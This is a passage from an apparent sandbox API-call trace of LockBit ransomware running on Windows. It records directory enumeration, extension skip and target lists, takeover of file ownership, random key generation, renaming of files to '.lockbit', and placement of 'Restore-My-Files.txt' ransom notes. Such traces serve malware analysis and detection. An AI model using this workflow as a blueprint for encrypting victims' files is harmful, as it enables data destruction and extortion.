(lpString1=".ndf", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.408] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.408] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.408] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.408] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.408] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.408] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.408] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.408] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png.lockbit") returned 77 [0081.408] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.409] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.409] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.409] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.409] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.410] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.410] RtlFreeAnsiString (AnsiString="\\") [0081.410] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.410] malloc (_Size=0x200) returned 0x77d800 [0081.410] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.410] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.410] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.410] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.411] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.411] CloseHandle (hObject=0x3b4) returned 1 [0081.411] free (_Block=0x77d800) [0081.411] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.411] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.411] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.411] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=24557) returned 1 [0081.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.412] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.412] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.417] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.417] malloc (_Size=0xb0) returned 0x77d800 [0081.417] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0081.422] free (_Block=0x77d800) [0081.422] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.422] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.422] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.422] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ba24f8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ba24f8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0081.423] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.423] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.423] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0081.423] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.423] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.423] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.423] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.423] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.424] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.424] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.424] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.424] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.425] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.425] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.425] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.425] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.425] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.425] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned=".png" [0081.425] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.425] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.425] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.425] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.426] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.426] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.426] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.426] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.426] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.426] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.426] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.426] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.426] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png.lockbit") returned 99 [0081.426] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.427] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.428] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.428] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.428] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.428] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.428] RtlFreeAnsiString (AnsiString="\\") [0081.428] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.428] malloc (_Size=0x200) returned 0x77d800 [0081.428] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.428] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.428] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.428] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.430] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.430] CloseHandle (hObject=0x3b4) returned 1 [0081.431] free (_Block=0x77d800) [0081.431] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.431] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.431] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.431] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5088) returned 1 [0081.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.432] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.437] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.437] malloc (_Size=0xdc) returned 0x77d800 [0081.437] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xdc, FileInformationClass=0xa) returned 0xc0000008 [0081.440] free (_Block=0x77d800) [0081.440] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.440] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.440] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.440] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0081.440] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.441] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.441] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0081.441] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.441] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.441] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.441] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.441] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.441] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.441] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.441] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.442] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.442] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.442] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.442] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.442] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.442] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.442] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.442] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.442] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.442] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.442] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.442] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.442] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0081.442] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.442] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.442] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.442] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.443] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.443] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.443] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.443] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.443] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.443] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.443] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.443] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.443] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 105 [0081.443] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.445] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.445] GetProcAddress 